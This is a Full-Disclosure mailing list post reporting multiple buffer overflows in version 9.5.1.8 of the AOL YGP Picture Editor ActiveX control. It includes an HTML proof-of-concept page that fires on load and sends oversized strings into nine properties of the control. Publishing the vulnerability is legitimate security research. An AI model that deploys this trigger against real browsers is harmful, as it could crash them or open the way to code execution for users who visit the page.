[Full-disclosure] AOL YGP Picture Editor YGPPicEdit.dll Multiple Buffer Overflows

The AOL YGP Picture Editor Control(AIM PicEditor Control) version 9.5.1.8 suffers from multiple exploitable buffer overflows in various properties. This object is marked safe for scripting. I have not tested other versions. PoC as follows:

----------------
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var s = 'A';

while (s.length <= 8175) s = s + 'A';


obj.DisplayName = s;
obj.DisplayName = s;
obj.FinalSavePath = s;
obj.ForceSaveTo = s;
obj.HiddenControls = s;
obj.InitialEditorScreen = s;
obj.Locale = s;
obj.Proxy = s;
obj.UserAgent = s;


}
</script>

</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:085891E5-ED86-425F-8522-C10290FA8309">
</object>
</body>
</html>
----------------

Happy Holidays to all!

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Relevant Pages

  • Date time picker marked as safe
    ... Does anyone know where I can get a version of the Date Time Picker control ... The cab file I have from the Microsoft ... site is not marked safe for scripting. ...
    (microsoft.public.dotnet.general)
  • Re: Weird Popup message
    ... Add the bank site to the Trusted Zone of the Security tab of Internet ... Check to ensure the option "Allow ActiveX controls marked safe for ... this page which has been marked safe for scripting. ...
    (microsoft.public.windows.inetexplorer.ie6.browser)
  • Re: PDF Active Document Always NULL In IE7 Embedded Browser
    ... interface is probably not marked safe for scripting. ... This doesnt make sense to me as I can get at the dispatch interface of ... these documents whilst the page is navigating, ...
    (microsoft.public.inetsdk.programming.webbrowser_ctl)